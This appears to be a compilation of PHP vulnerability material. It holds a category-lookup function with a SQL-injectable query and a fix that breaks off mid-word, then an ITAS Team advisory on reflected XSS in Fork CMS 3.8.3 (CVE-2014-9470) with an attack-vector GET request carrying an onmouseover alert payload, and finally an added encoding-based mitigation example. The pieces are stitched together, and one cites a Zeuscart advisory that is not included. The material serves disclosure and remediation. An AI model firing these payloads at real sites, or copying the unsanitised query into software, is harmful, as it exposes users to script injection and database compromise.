public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    $categories_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;

    $table = $this->tables['categories'];

    $db_t_content = $this->tables['content'];

    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }

    if (intval($parent_id) == 0) {
        return false;
    }

    $data = array();
    $data['parent_id'] = $parent_id;

    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }

    $cache_group = 'categories/' . $parent_id;
    // the raw $parent_id, not the intval()'d $categories_id, is interpolated into the query
    $q = " SELECT id,  parent_id FROM $table WHERE parent_id=$parent_id ";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);
    if (empty($save)) {
        return false;
    }
    $to_return = array();
    if (is_array($save) and !empty($save)) {
        foreach ($save as $item) {
            $to_return[] = $item['id'];
        }
    }

    $to_return = array_unique($to_return);

    return $to_return;
}

 

- Fix code:

public function get_children($parent_id = 0, $type = false, $visible_on_frontend = false)
{
    // $parent_id itself is now cast to int before it reaches the query below
    $categories_id = $parent_id = intval($parent_id);
    $cache_group = 'categories/' . $categories_id;
    $table = $this->tables['categories'];
    $db_t_content = $this->tables['content'];
    if (isset($orderby) == false) {
        $orderby = array();
        //$orderby[0] = 'updated_on';
        //$orderby[1] = 'DESC';
        $orderby[0] = 'position';
        $orderby[1] = 'asc';
    }
    if (intval($parent_id) == 0) {
        return false;
    }
    $data = array();
    $data['parent_id'] = $parent_id;
    if ($type != FALSE) {
        $data['data_type'] = $type;
    } else {
        $type = 'category_item';
        $data['data_type'] = $type;
    }
    $cache_group = 'categories/' . $parent_id;
    $q = " SELECT id, parent_id FROM $table WHERE parent_id=$parent_id ";
    $q_cache_id = __FUNCTION__ . crc32($q);
    $save = $this->app->db->query($q, $q_cache_id, $cache_group);
    if (empty($save)) {
        return false;
    }
    $to_return = array();
    if (is_array($save) and !empty($save)) {
        fore

[FD] XSS Vulnerability in Fork CMS 3.8.3

2015-01-12 Thread ITAS Team
# Exploit Title: XSS Vulnerability in Fork CMS 3.8.3
# Google Dork: N/A
# Date: 12/26/2014
# Exploit Author: Le Ngoc Phi (phi.n...@itas.vn) and ITAS Team (www.itas.vn)
# Vendor Homepage: http://www.fork-cms.com
# Software Link: http://www.fork-cms.com/blog/detail/fork-3.8.4-released
# Version: Fork 3.8.3
# Tested on: N/A
# CVE : CVE-2014-9470

 

 

::VULNERABILITY DETAIL::

- Vulnerable parameter:  q_widget
- Vulnerable file:   src/Frontend/Modules/Search/Actions/Index.php
- Vulnerable function:   loadForm()

- Attack vector:

GET /en/search?form=search&q_widget="onmouseover="alert('XSS')"&submit=Search HTTP/1.1
Host: forkcms.local
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; __utma=23748525.1232410121.1415937482.1419392332.1419480017.3; __utmz=23748525.1419480017.3.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); track=s%3A32%3A%22f0affe38cada8e7de19ad2edf36f92a6%22%3B; frontend_language=s%3A2%3A%22en%22%3B; _ga=GA1.2.1232410121.1415937482; PHPSESSID=gailpg881ubvtsmroh2p1bfqn5
Connection: keep-alive

 

- Vulnerable code:

private function loadForm()
{
    // create form
    $this->frm = new FrontendForm('search', null, 'get', null, false);

    // could also have been submitted by our widget
    // q_widget is copied into $_GET['q'] without any filtering
    if (!\SpoonFilter::getGetValue('q', null, '')) {
        $_GET['q'] = \SpoonFilter::getGetValue('q_widget', null, '');
    }

    // create elements
    $this->frm->addText(
        'q',
        null,
        255,
        'inputText liveSuggest autoComplete',
        'inputTextError liveSuggest autoComplete'
    );

    // since we know the term just here we should set the canonical url here
    $canonicalUrl = SITE_URL . FrontendNavigation::getURLForBlock('Search');
    if (isset($_GET['q']) && $_GET['q'] != '') {
        // the raw term is appended to the URL without urlencode()
        $canonicalUrl .= '?q=' . $_GET['q'];
    }
    $this->header->setCanonicalUrl($canonicalUrl);
}

 

 

 

::DISCLOSURE::

- 12/25/2014: Detected vulnerability
- 12/25/2014: Informed vendor and the vendor confirmed
- 12/26/2014: Vendor releases patch
- 12/26/2014: ITAS Team publishes information

::REFERENCE::

- http://www.itas.vn/news/itas-team-found-out-a-cross-site-scripting-vulnerability-in-fork-cms-70.html
- https://github.com/forkcms/forkcms/issues/1018s
- https://github.com/forkcms/forkcms/commit/4a7814762adf4f56f932d95146c7e4126d872114

 






ITAS Team

ITAS Corp. - Be protected with us
Office: 24 Dang Thai Mai St., Ward 7, Phu Nhuan District, HCMC.
Tel: +84 - 8 - 38931952   Hotline: 0903445711
Email: i...@itas.vn
Web: www.itas.vn
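As an added example (not code from Zeuscart or Fork CMS), the two context-specific encodings a search page needs when it reflects the term: attribute encoding for the value="" that the Zeuscart response earlier in this listing reflected raw, and percent-encoding for the ?q= canonical URL that Fork CMS's loadForm() above built from $_GET['q']. All function names are hypothetical.

```php
<?php
// Added example, not code from Zeuscart or Fork CMS. Shows the context-specific
// encoding that neutralises the two reflected-search XSS cases in this listing;
// every function name here is hypothetical.

/** HTML attribute context: quotes, angle brackets and ampersands become entities. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Zeuscart case: the search box re-displays the term inside value="...".
 * The PoC payload "--><ScRipt>... relied on closing the attribute and the
 * tag; after attr() those characters are inert text inside the attribute.
 */
function render_search_box(string $term): string
{
    return '<input type="text" name="search" value="' . attr($term) . '" onclick="searchitem();">';
}

/**
 * Fork CMS case: loadForm() appended $_GET['q'] to the canonical URL raw.
 * The term is percent-encoded as a query value first; the finished URL is
 * attribute-encoded again when it is emitted inside <link href="...">.
 */
function canonical_search_url(string $siteUrl, string $blockPath, string $term): string
{
    $url = rtrim($siteUrl, '/') . $blockPath;
    if ($term !== '') {
        $url .= '?q=' . rawurlencode($term);
    }
    return $url;
}

function render_canonical(string $url): string
{
    return '<link rel="canonical" href="' . attr($url) . '">';
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs shaped like the two advisories' payloads.
    $zeuscart = '"--><ScRipt>alert(/ITASVN/)</ScRipT>';
    $fork     = '"onmouseover="alert(\'XSS\')"';

    $box  = render_search_box($zeuscart);
    $link = render_canonical(canonical_search_url('http://forkcms.local', '/en/search', $fork));
    echo $box, PHP_EOL, $link, PHP_EOL;

    // Neither output may still contain the unencoded tag or attribute break.
    var_dump(strpos($box, '<ScRipt>') === false, strpos($link, '"onmouseover') === false);
}
```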

 

 

